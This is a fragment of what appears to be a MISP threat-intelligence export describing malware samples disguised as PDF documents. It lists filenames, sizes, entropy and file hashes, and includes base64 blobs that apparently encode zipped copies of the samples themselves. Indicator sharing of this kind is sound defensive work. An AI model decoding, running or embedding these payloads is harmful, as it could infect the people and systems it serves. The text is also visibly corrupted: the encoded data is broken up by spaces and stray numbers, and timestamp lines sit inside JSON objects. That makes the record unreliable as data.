o M B f I S 6 P Y z W I N v p n b 6 C C 70 S 7 W 2 n v w 2 q t W P F + F F / j 9 R q e 1 z i d N l m v R Z 5 v u T I W a g g 0 f 0 0 y s s V i w S / y t R V 7 b Y + Z u / 2 L e l z J G 4 A l D q 2 c 7 M G h / e n Q / W q R h V Y k m c B I / f 6 j n S i E v P j G j 1 d B 6 q C l p y 1 i A K 4 E v k K A E x P e r n + L D 8 S o 7 z 43 h c x M s 6 p Z x M V 6 + e P r f y O P i 7 y q Q h y Z + 3 V a p y d i f x 7 Z d + + j j C U 0 D b O y t p J g B e x G m k F N p I P 9 z w 8 B i n R a 8 W 58 C u G w N L l z r z A 0 r J J s r l p l 7 J 2 F x F o p K M c 29 I Y b X 2 X y n s 0 W a C 79 t 69 z U 3 B I Z u o d q C T 8 t j Q S Z + G q k i n 1 K e 7 m 3 s 7 C R m j l m q v 0 4 v R I w G y h 96007 o d E e C O j c i E A F f J K l o H q A n 1 m H z i L K l T G k n 1 P J 8 C a L U h D x U W M G 59 J I n q 4 E b 6 y Z z / z F R i I p h 27 o K V p A R + V 13 i r T 7 L T 7 a Z x p U X 6 B 2 k 79 H / n F 0 92 I 7 O I m 5 / o p h R 4 q 8 g N g N a 4 h k K k c X 2 A h X j H d E e i s r 5 s 8 d Y l G V l s a v J p K R j k m O J D f w o X 2 H 5 f X H u D r r Q 1 N w a n d 8878 w k c K z H 6 e r f 6 r H V S N Z F s q j r 4 Z 9 g h p q 35 C t y 6 h d B j C n A f 4 A K p C l X Z r v A G 50 g G 22 P h A s p A k A 1 O u 1 G s i y W a t Q O v g M 8 F z p k B s + 1 k i 1 i e 1 i h p 27 g w n v S s 8 j g P Q O 6 Q y 1 N v X B s o d B S L 5 W 6 a K T B e n c X Z P C A b B 9 n R o A W O 4 C q B X M G M T M S N n S 6 J d C q n E n H 1 X U O Q M J Y q Q 5 F j v Z Q b f f H s b u k K X C R Y 4 g b n T + Y 7 q f e s b 7 t / Y y L e U g a t b R X E n B d 9 Y s F b a 8 F X F P Q + g O y 9 e Z o v H 55 I B U l 9 U O H g I L r i 9 g L 1 k b / z e 8 g + u p w q E g j / Q S 3 q s D Q F U 69 v C y B L n 7 j p p R C w n s 0 p p X + 9 t m F s 9 p c F d y v Q o 5 o 7 L + 5 q A H o 0 g i 77 J T Q B y H V r s q L b 5 K q / W C 4 / l n C 17 u 9 f + y L 4 p 8 t 1 + V r p d C c 4 B H a K K r i A u w c x b 41 Q a I o w N p V G r L P I m 8 L v o h u K s z G r P x / D O 0 E S V m 5 d H j G 0 s 3 G F i a E l k / X U O z u Z h P W h h s l 8 d r d s k O J I W I l s 5 + s b I A 38 X q L W K M Q s u f B V q C D 2 N a M H R e F Q 3 r v 5 V r f q 9 m 7 Q c D g q T T P l 4 Z l h T w r H m W M l / m G 2 J W Z e V O f 98 b Y 0 j N J H 3 E W 2 b 8 Q x E Q j m 6 / A K S Y q c h L o 4 D m + 6 t j B h j d s 81 s 6 x C l Q 6 P B l + s 64 u U c d z g 0 2 E A W q 8 o J E s 4 + b 9 x F l u b x E G N 2 K g 0 R V D R B q 3 k 6 e V m H Y 2 t e / v P 0 x 9 W W 5 e a 7 Z o K + Q I 5 z e s c s 97081 x w Y s 9 Q H v 7 H I J 301 H A E k P 44 q W 0 B o 0 80 d X 0 x 8 g 9 C w V T R 1 k V U o n B V w R B U 1 j C b d A o o K F 13 Y T 9 R a n t 1 W J o 3 T p u l N V D l 5 r r 3 Z W 0 R + e R O 48 S h Q 6 V x 12 U Y F t 4 + H H L F a m 6 S g C B h 8 f h A c k y E E s B n C / B h Z I v Q P D I h Y 5 a O d O q E x M m e l c N 3 w e p 0 d 0 l s d s / K q N n I u M Q o t f A s + z F U 4 M o d 0 t S j i f a Q h 1 E J 2 o P O n r k E I W o d j r / 9 t O x D Z H f E p 7 E w q L z W / 9 P j A d o 5 P H y F L b 3 V b f 6 u X G r m 4 K K W F W L t 9 W W d a v D 0 9 e C Y K d P G 2 H 4 V 3 g S / r P g X r G f S J 8 p M / H H 8 W x k 2 M C h 65 z d V l T V 7 e U p z W t P r X x M c e j y d r 43 O q 9 p v y L l Y 7 P P J r E Q 4 x D o n A J 6 u W J I u s F S 9 S 3 I 0 / 1 o r Q b e 8 O u 7 q f Q 7 + H f S E d j 4 i z h I S 0 m 48 b j f u U d q C Y T y p Z + v Z l m B I 6 P B 9 c z b p / h g x v Q t O t c i k M 2 Y s l O g m 94 T Y v k v 9 Q R e 95 N 1 y d 2 B 4 j I 96 U v x P v p W K 3 u f 0 N b X 3 v u 6 G M I Z B B 3 J R s R f f b k 8 G k s v R M K m F v 43 O l t L I v + H x v 2 j 86 e j h c b t 3 x e 6 T h L Z T P r p 6 X q 38 v W n x f k q p L 5 a g u 9 O O Y W q N P 6 A U 65 n e D z t R G r W t w 1 y l L f 1 z 8
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "malware-sample" ,
"timestamp" : "1558002047" ,
"to_ids" : true ,
"type" : "malware-sample" ,
"uuid" : "c0e50a57-4860-47c8-adfd-6c287c2d035a" ,
"value" : "56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936|164db8d1fe5f2ea9dd3ea826b2f0b808"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "mimetype" ,
"timestamp" : "1558002047" ,
"to_ids" : false ,
"type" : "mime-type" ,
"uuid" : "30f320a6-a7ef-4d91-a736-c283b75f22ba" ,
"value" : "PDF document, version 1.5"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ssdeep" ,
"timestamp" : "1558002047" ,
"to_ids" : true ,
"type" : "ssdeep" ,
"uuid" : "e92b5145-d834-44b1-963f-6dbc6706c690" ,
"value" : "6144:xaYsXXzUbbQ+6K4R44u+aUg031qLD0AjJ1sGBIK/:xaTXX+iKO1u5uzK/"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "17" ,
"timestamp" : "1558014535" ,
"uuid" : "9608228e-4373-44ac-9fdd-bd37d5b02275" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "9608228e-4373-44ac-9fdd-bd37d5b02275" ,
"referenced_uuid" : "9156df9c-4067-422e-bd38-8c3908e8ea5f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "analysed-with" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd65a8-d778-48d2-a710-4be7950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "9608228e-4373-44ac-9fdd-bd37d5b02275" ,
"referenced_uuid" : "5cdd63dc-0b30-404e-a1c4-4479950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "contains" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd6a47-543c-43fe-b89f-447b950d210f"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1558002048" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "ae9ed01d-f3ad-478b-bb91-11298a40fbc1" ,
"value" : "ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "size-in-bytes" ,
"timestamp" : "1558002048" ,
"to_ids" : false ,
"type" : "size-in-bytes" ,
"uuid" : "f776b540-fcca-4c66-8893-edcdad7ff00b" ,
"value" : "252891"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "entropy" ,
"timestamp" : "1558002048" ,
"to_ids" : false ,
"type" : "float" ,
"uuid" : "ee181244-ea41-4d2e-8a66-62177efaf432" ,
"value" : "7.9916147992407"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1558002048" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "c16fc5e8-717e-49b3-99d5-5863cf055b3b" ,
"value" : "08b49fb9882bfc8f69beb594fa543c8a"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1558002048" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "8ca900cc-de41-427d-a168-ac258161c011" ,
"value" : "201e85d6bc519ecc6dece75b2586e761a56db6a7"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1558002048" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "ba93fe18-9b09-4267-a47c-b1397bc7500e" ,
"value" : "ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha512" ,
"timestamp" : "1558002048" ,
"to_ids" : true ,
"type" : "sha512" ,
"uuid" : "f12e7b2f-5c8a-4137-9afb-e86acdbcd902" ,
"value" : "b4a446c95e7239a3e491ee38e77ce8e1e96c27ca9c1cc25ca941643f366c62f81eb9942a1d80304bfc321c24cef86288f315bf97eb5f3738ad3618fbb6c86eb8"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"data" : " U E s D B B Q A C Q A I A J h i s E 7 l n H e x B K s D A N v b A w A g A B w A M D h i N D l m Y j k 4 O D J i Z m M 4 Z j Y 5 Y m V i N T k 0 Z m E 1 N D N j O G F V V A k A A 4 A 53 V y A O d 1 c d X g L A A E E I Q A A A A Q h A A A A + d v N 2 s v q 4 e k s M O T r L i E Q j i s F n V R v e d X g V O 0 6 / m e y B N C z J + c k Q R w 5 r B 7 f y 3 X x 9 b 6 t T x y y / k m t n + g m R R b U W X I 16 a i i w 82 j d a z w p q u v G j 8 y t 1 K G + C B Q o F J 0 k O J 6 y U J r 4 T 9 U q t 6 B f t z 6 s y K j z I O A j + i l O F p k o 8 E N 7 + I a o m K m i C k q z w E T 7 + N o X b 0 T s D n B o z 9 / 4 O S W y x 0 6 S U F X / h i R P B 7 o r e l j x k N Y i w B E X P D b / E e h l 6 o l l P z u 2 E L M a 2 T 2 v B r x X G L 5 R C J D p F g P 6 b I f v M / Z r g d 2 G D x 0 F C L U 20 W 2 L b k L 4 J L n S O r u J T B 1 O u + 1 + 2 y H 9 X 5 Q m y M W 2 E G F N 0 o d q u a G M Q t f V b D T Q h h w Q V a z N T J s i u J V w C q e i u O J W y t j U m U n n Z r 51 q y m D U o 9 Y 4 A m E H Y 8 f D f j J F k V Z s e e 1 X n j F Q d D l 8 x 5 E X M p + 7 p K 5 b 7 K E K Z r G b k P D a J l I S e H D N o W t k M r y Z y m M f P U E D N g 9 F 7 b a K / D b p T W h E + h Y A m 6 t c v M W m y W w g / m Y I g 1 O g M v 5 + r G F 6 e x j W y r 3 f v I G e X r c o e C R D s c W z p W X t W s u 673 L L Y i j U Y 5 A K H I E + z 1 g 0 b + f Z O Z z f 3 G B t S N / a x 7 m 1 U Y + U J 36 o E w V 0 A D 2 i S N A D e p H A F D 1 X Y x y U J 10 p Z L x C 78 G B n e N O V z G + o G h l + j m T 5 C f A T B n g l F c u f c r 9 q 5 i O + s e 2 E y U h 7 i 2 R D / h Q T + 2 V f k Q / l J u R f 6979 z A / t I H G z Y V i E 9 s / q y y + 1 m l F s T c x w O 8 e m C G 81 l X O w h H R a G U t N M P E L d E I e o V m Z W b A S 4 D r D P E y Y 7 Z Y v P u L g X + I f P N 9 B B n S q h w a j s v O s y 11e1 K 86 K u / E 554 n q S I n V F G N l w X V c X Y Z T u 4 D / m + 35 v h C 0 V + M a j Y v 8 e q 6 k i e c S c 3 V T X 1 L i m z 0 L P h 0 0 + W 98 k j l + k 3 z u X Q 7 Y K 9 f 7 w i r D X f y c 1 A 6 d d K U 77 H p f X p A A d v v K 2 r j V 60 l G S K / U E l 5 S s G 5 I p 8 d m K v k T A 4 l W d t C I c F j g o A e / L q S D 9 D Z v / l 8 V q b D i l y o J h y J D 3 A s C C o Y E q d K J o K n 9 D m / b K V N y l 2e3 W 3 M d y n 8 g q k A f A b h y U M V j v I x k 2 Z N w c d y b q r b g t m Y 5 p I 1 + U a U B l 0 L v C P / O M M j 7 u B M l F B 4 e Q P F C E u B O Z a z e y B b r 9 i r 7 g r Y M g O H 6 / C n z h p g P + x P f q 4 R G b Z L a W P D P Y 48 Z B k F F J 39 g q D k w p 84 t 0 G 1 G 9 H X 5 O y e 2 d B 6 Q A 1 b l b G m U u T d w W r T 0 8 g W X 0 b 7 q N S z z V e b l O v 0 J 4 R v i r a 3 M O r a o H 82 Z F J I T O k t 1 f a C I t R d 9 x K u 4 K D n d O v Q n P x L 6 c N b J s o b e n S v m R P Y g q y E R h V e s z V O g J 6 L g Y O O R 1 / k 8 e B d Y U h + 0 i B X F 4 i h x u O r r S C f L E x t F H I h e f d e G J B 9 W p N 6 G M 9 E l u k l t u z 5 c s Y A P w S v F a K j 6 G V 1 J w o k W z 19 k i L 46 g h 0 t F f s g L y s i 64 r 6 J w i Y O q 3 p x N K c m h 7 S G J m i C p O K V 6 B A V W e y F K e L Q E G f i G p 2E2 s W F 8 Z b 19 u F R v N S n g K q r 2 Y l d Z u 7 t R e Z z 7 c N D w k Y M n x F H y v a 8 k P 8 h o b G I o G T C z I z K n Z E r I C L c E w A k g B L 216 P g T R 4 W c Y K a p 3 U o B k T T y X k A l k C j C v 8 K 8 n 5 n X K 5 l f P X i 76 P U w w W z n X I N M G K 0 F u q 2 C M A X 8 x K r U N X k D K O H u U 4 w O M h O h i O G e B 6 L j T 5 + P 1 I n o l 9 w g v r U 3 Z A i W 539 r a q i O f l 2 g 1 j V Z + C b b c x L K l x r t 0 b E h O M m 3 Q q u G T / 2 c s v S 0 f F e k 8 Z N r q G + r C w o S A N H 1 j 2 z A d h F B t S F V s r 5 y t F j n O m 9 j w 0 Y N E 0 v k P C f o i S 0 N Z G a S Y D G O 3 n A j y i X q y z O + 2 h R Q r G W u 13 L x u S Q C w 2 r i R h N 353 G m I d N o b 3 s q I s e 6 r 0 3 V Q q Q / 8E5 Q Q Y 2 / 5 m 63 B S 7 a t 5 o q c S I u 2 I y y t 0 g B d 2E2 i H A z S h I 43 m d J G x G o t i h S G u v g / e n Y 2 G d l N j d 3 a Z U D U R l G X G Y D d J t p W Y D 7 P k f B u U Z E I G F 8 I C l N F w p U c h M y D i V d v P J A d t m C J O T C C 9 o 105 u q k z g 7 z l R 6 B C i g m o / v O 0 k x x l 5 p f J 5 R J d w W g + E W U V T U J N N T / d M z k 3 M r 2 + m i X 2 y y f y w 51 q b F V I C O M A e A 945 N 26 H X 0 x n b + t r G + w e 77 V t + + L V L p / U Y 4 P 0 B 6 O S o U B U q v d p n t 6 K o n 636 Z P G N N g Y Q y 5 m j c V V 4 p L O z F n O s W m Q N M 8 x B Q 2 x / v F G C 0 I X / E l 6 n g C O / L V k t M a S x t 9 X 249 M h e w 3 B X A m V F Q 8 b 2 Y o D 2 j i w L / A 7 f y h z U C + h s T i 5 U 4 b u s I I E K 1 L J c A L / b R 4 P 1 Y q g W K j L e M t t a s l L T R s I 1 x t e x r 8 K 71 g t 7 x B P s S C 3 x W A 6 h 53 I e 3 / P E B X 9 V 2 q M J 6 T P 2 S j r X w f X + a h W U q D s r l 55 X I E P p 7 Y N h / O p g 2 Q b z i D 6 K i 3 G r 2 / I n m 79 C 8 a c + 2 Z d 1 T U K f u 3 h 29 j f 6 L d 4 U / Z u f Q g B f H j b Y 8 W F t J M c s L G r r y D B G G R s O s T W I o E f S J e o x C N c 6 s k 0 k d z i T R 566 Y B G I H S R O s Y V 2 G j l Z S 95 P Q S P n 2 i D R N + v D i b Q B 5 R x C U H + z m e 53 f r 2 i V t D f o 0 r + r f p H 0 A G J f 37 c R 2 Y P 1 G j 7 n 9 Q 8 i y Q E 19 w U l k E 6 Q 5 F 9 I 1 A s G 5 Y b n I 7 W f U y u q b P V a t 49 L R X b h i J C R H 5 a M s T W 1 q 4 i O C r W e F 3 k u e G l y W P d 8 P i a R 4 P c W z d / X 2 c C O h U v 45 O D 4 o 6 A P N 8 J M A 8 g n 3 J K i j A f + M V 0 V J B v / g V C J s D H e A i / 5 R z P z v q p 4 K C R 3 b Z i 0 l 2 z N P j r F p M y I v u X q T D q e f J q Q j R m o X S 9 x W W q C c y P p U N 37 V f K A J G g o Y q p j T a N h B U + e r K n M x E v J b + E X n d T H M y t L / N 2 Y L c t 894 l / r 2 f t g 6 o M Q 8 M P V z 7 x W z 94 h l L A r 2 D 3 T A k D O 7 f j v T q r N / K M s p e e o H c q j l L p z G M E 2 Z / g 6 V L S J H 7 Q 7 R X W d 8 v 0 i s B Y L i R s 3 M T r r w 5 K 1 h l Q H s O X T u r j 1 H q 2 k t s V y 7 k r u z q u X N C G D i h 83 z C / h S 8 Q 12 p j z B F v R d b d e o V / O t q O a M 85 J U N A 3 F 3 v d n 5 t j Q M y W 0 / e / H 5 A L O m s W 1 v W Z a U 4 T / f Y / g u / a z v M P c S 8 k Y Z + + O n 5 V M A n 4 r 7 c j g u 6 q V 2 w d r z U P + a s X l L 7 D D a V W C f e N c z K X Q s X Q c 2 Q V O c c A H G K W m Q a 68 C C q q g B Q V X J P W g s k 2 N h k z 2 n b f K 53 j G E 36 n s w F y I G x t 0 Q 0 h A 3 i f G z D B A n 4 R p 0 h t n h u 786 / 5 Y f K 3 A n + R F T g F O P O 4 X x 7 x u E 41 k k O + B 91 Z h A f J g V q x R + z U / r 9 E J E + h A C F D J Y D u 1 L / o A H 2 a o 2 J H R E 2 z + 6 p 1 S H q i M j d 2 x g G J V 0 F 1 X L t G H 9 V 9 A P z k p p d H u 19 G M L i 4 h k Z k s c + p U J 4 o 3 R L c 3 Q i 3 a W k C f 50 v k a 2 m L q X S K 78 A w 9 R L 8 o + u t k m W + 1 S Y 6 R d E 3 s 94 Z 7 G R S D a Z 8 Q Y 9 R J / 2 o P 5 K W j A L O r r / B / 8 T b 6 u p g 6 O 4 + p y i c C p e 81 f d I i J c E F t E 6 o a + T f k d 2 x I 5 l t o C W 520 n 7 l W U x t C m j g J E w m k H H 3 l I C G A O 3 V k X a q m v m 5 K X A L r L C P g H J 4 y n i C Q g 0 L k g i V e n g i z F Y U n L y 9 n F P Z 6 o l C K C o N F g k 0 p k 2 i S Q / u + s Z 432 T I 5 E H d f 2 J p f G m C f Q d C S b 6 b z 5 O c x F k J 6 h e v X p p l o U p D r w 0 M R l T Y 2 l X 3 b n 7 M p z M L O / 1 F g a 3 x I b Y g A P j N B b T r c L R Y 80 W 43 G f r U x E Y p W Q z Y W F T Y H T 3 E i Q M P + b G t F t + G J 7 b H 4 i P c c h R g z e f n + 4 o c q M q b 7 n 8 X R v w v c Z s 7 q R j g T T t Q L 6 / 4 C w Z y W d Y / i V t h W d z z 2 O 0 68 U B 4 f + E 2 O E P V j l H P n q F 0 m r j J K + 4 t j h O E M e V H w R w z t w d p f T I H 8 F R L 8 a 3 u Q r d M M l f m n A H M X K B I a 4 r b Q H V J h X t A o T m A m s I A 7 p d i 21 q C i Z o h j B N s N o b u u L K 5 r G g C A i S m C v X d 0 E Z u k 9 W U e D R 1 e A H F n 2 U Q E V x i J M Y 3 x I Z 8 r d v 0 7 L s f r k 6 y t x H H u M e z m D 0 v q x P J q g u S w 2 k z o T K O 41 e f C a e M k c W 3 Z J K 1 K o X 2 Z Q d f 3 x M 9706 T s P R x g h E V d q Y 8 k M P 4 d + Y f x 3 B J X L T L k S f q r t C j s c 2 i R q Z t r 670 o U R D s D O A P Q M a F v G R G r D
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "malware-sample" ,
"timestamp" : "1558002048" ,
"to_ids" : true ,
"type" : "malware-sample" ,
"uuid" : "a8115929-5cfc-4282-be04-9652248f41e9" ,
"value" : "ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73|08b49fb9882bfc8f69beb594fa543c8a"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "mimetype" ,
"timestamp" : "1558002048" ,
"to_ids" : false ,
"type" : "mime-type" ,
"uuid" : "b9eecf42-8b42-4e3b-a36b-0dca3bf41f59" ,
"value" : "PDF document, version 1.5"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ssdeep" ,
"timestamp" : "1558002048" ,
"to_ids" : true ,
"type" : "ssdeep" ,
"uuid" : "8f33dccc-dcf5-45d6-be03-5d5662490fff" ,
"value" : "6144:mc67OzUcoXxC24wOOLDbjRC4xzE7mkHNw+4je6iMllT:mcNzxer4fiDbjRhGDH9Oe6Hl1"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "17" ,
"timestamp" : "1558014309" ,
"uuid" : "9b01cb2b-b6f7-433f-a91d-7b572e8324bd" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "9b01cb2b-b6f7-433f-a91d-7b572e8324bd" ,
"referenced_uuid" : "c22ccebe-e72f-4b92-9c63-a196b4959c43" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "analysed-with" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd65a8-ed6c-4be4-999f-4158950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "9b01cb2b-b6f7-433f-a91d-7b572e8324bd" ,
"referenced_uuid" : "5cdd683b-6530-4b0d-a8de-40c1950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "contains" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd6965-cd78-4435-a186-4f0a950d210f"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1558002049" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "2fd88b37-70fd-48b6-b918-c1d29b69eb38" ,
"value" : "0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "size-in-bytes" ,
"timestamp" : "1558002049" ,
"to_ids" : false ,
"type" : "size-in-bytes" ,
"uuid" : "54ffcd31-7d98-47c1-839e-d42b9ed54acd" ,
"value" : "447466"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "entropy" ,
"timestamp" : "1558002049" ,
"to_ids" : false ,
"type" : "float" ,
"uuid" : "3fecf7eb-28be-471d-a575-1076dc6a1dfb" ,
"value" : "7.991595563552"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1558002049" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "98ef2711-7495-4299-923a-8b6380713a06" ,
"value" : "1baa024f9cfab48b92c297aa406c91b5"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1558002049" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "6c35d0d1-89d9-4118-a8ae-17663754cfcf" ,
"value" : "7d5a1dc90d535e3cc552d0db02841d28fb1ae773"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1558002049" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "a053b420-013d-4a22-bcf9-7adf561277b0" ,
"value" : "0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha512" ,
"timestamp" : "1558002049" ,
"to_ids" : true ,
"type" : "sha512" ,
"uuid" : "6bd616bb-6010-41c8-b9f3-1c68921b40e5" ,
"value" : "4137bd777e8167e964d3ebae98720cbf532cc0afac726522a668949dbc841150aa4aa600813142bb9ec6f999bd97ddd07b9bdf885034699305381382cfba6416"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"data" : " U E s D B B Q A C Q A I A J l i s E 7 l 2 B A U s 44 G A O r T B g A g A B w A M W J h Y T A y N G Y 5 Y 2 Z h Y j Q 4 Y j k y Y z I 5 N 2 F h N D A 2 Y z k x Y j V V V A k A A 4E53 V y B O d 1 c d X g L A A E E I Q A A A A Q h A A A A 9 j N 7 K 3 s n o 1 m Z E c R / A + X 5 i X h K 88 Y / T 9 D w 12 n P f u V C 6 e k a 4 Q m Y K s u y z n q o T p m W j e 8 j Q d R 2 H Y G I o I d u Y + Y S E / C Q P p Q 1 F J m a n i Q 4E4 q X 9 k q J w e J E T a Q s J a p h 0 N 2 W F l m l f 8 H t z l + R X O w m r y J f 0 3 p 2 Y u u Y q g y A H Z 7 + u p q Q u x W / M w a t 1 r m S M V w u T 44 h h 2 X L j j D U v z n N f C i D Q c A p i 0 s S I b 6 b E b s M L D S A R Z y P H r v 6 i q k E w h W i 5 + h y y l n c 65 W 5 r y p C E Z n c f 22 x o C W V f 3 A P C i F U g l y f C 1 C D 9 M j 6 T k b j S Z z B U c C F H o g G L M + w s 8 a Z Y f 8 I + I 9 v 3 r w g / s P 5 Q W T D x L z 9 Q Q E l B b e d m P 6 n t M D p j Y E U y t U P 7 Y f W 0 7 L L I + C i x J + v f 0 Y 1 + Z j t i k O L k 4 Q X q e a L 427 J E / k 9 F p s u / I i v k U G g 0 L V n c G c 26 j Y V O d + f n x l x p 8 j 2 o z t y N 2 e V g S U Y R Q m c Z H j N p M x l H p J O j H 0 w N R 5 e z 0 s N k 9 Q i m F w d 0 X 0 X a c f a J J 3 J A F C C w v H R c C B U S R j R C h l e h 48 Z g H e 4 K s N x 39 r 30 F d o e / r / o G M v 3 K u D A Y t W L o t M V c b g k h 5 i M c 7 F 23 n o L i s J h B g l E k 7 q 765 R b 7 Z L J 1 x + L i U I Y R 0 H 3 H X C 4 Q 4 z d Y m n Z T i 0 f k w S D B E x z s m Y 4 R y 8 l 7 Z o t 4 Y 5 a b 5 W 1 a B u F m + N d B 18 J e g o M I W f F w V / p 3 J n d w Z D / u M s z M v Z g l 7 C 1 n j M f 5 g b 1 U B + m S f 65 i 2 Y u i B d B 8 Y 4 y d J C 69 L o H O p e G V 1 n + 4 u e h v Q g 4 X 6 u j f m n n J C / 68 r k r i M A D 1 / B / e o v g V 14 u 3 B w / z a I f K A B U W / X k B 0 141 Y L + E d M 9 Y P 17 w 7 / Y + 5 C G t P j p U k u V 0 V g B O Q H J P q 67 A F 9 b g O o P E B 98 u f r 239 g 9 w p A C 500 p b 6 u n i L s E 7 g u H M C 1 q Z g k c 3 d B g / o x n L t f 47 V E E w f 68 P 8 h p H O 88 f v 37 C F G w 6 K T X C 7 L Y v m D p g s X g n P e g T j u G a V e 217 p Q p x C + U + F M z M J O F I E D V J 3 X p f Y 4 b b Z E X z B I i P w t r X l D E 9 R v W Z V h y U W v u x g x m h J J z L y 8 Z w w S V k t w w d m Y w V t e X 1 b 49 U d R M K x q h S + A Y u A 5 i j A 0 D S I Y N 2 I T k K R Z T A k X f X 1 y Q K g h B q s h O P g k b U r I U O x H m e G z n U k h o Y n + X P k 0 H p 4 C d 3 o H z m 3 D 53 u 1 D V r n r 1 / D f 8 h f X e Y u z n k I B N I K T D c 3 N x 289 Y 97 e o M n X q J o 9 B V b / i l a 48 t Y P 0 t Q J k 2 V 9 P 2 M H S g s M i R d o n 7 T R b L L z S A v Z n 11 y J E X n Z a 9 U q f D Y 4 n M F z Z u z 1 M t 4 e Z e 2 A 3 n + 3 s l 1 k t A x A + s L 7 g q T V U b n S r N Z f g Q i M v j o W 4 M z 6 B R 3 / 1 S Y 6 W E Y 2 w F l f W Q H n m d l K j K t P + 5 O 3 c K V 1 E J O n y P t t h Z q 8 w N + w T A w c L z S 5 V Z o y d g a X n K 9 a X Z q J f F 5 X D c v H U 4 X L g L e b 0 e C v 115 d 8 s 0 i V o 68 v E a C G L C c 9 O O W s 947 h H J Z V f U M y g d s H a R t m / W O h h h 8E9 D y C L l L Z 3 a R 7 Q 48 A F t d d t E w x Z K r g j u x C I e / 9 g h H q J M j f b p 4 C 3 W h G k L b E Z v B X / G r D a t 32 g v / a h 0 X L O / + W 8 m Q j D 0 R l 2 C D 9 w a b j r P F F w + W n x u L n R t I R r A j P N 5 s F F n q z 13 l X B 8 h O 2 h K V p a a d t q Y o Z h x J c Y G 7 / L o D d L w F z W E s e j 8 c 8 L c g g 36 + j j u J N g w n D J V q n V / 1 / + U m N d t A X G O h n p 5 G f O t f z I x q b m r X S U a 9 g B X M v p L / u r 0 N w D F S t 3 g 0 d S R E y n 6 m u 3 s v y c 9 p O z t 4 m M F p T U z R b i k D M 6 L n / j V V P Z i A m 16 J 8 h e 8 T U M M u S 9 D 6 r S M L f w 6 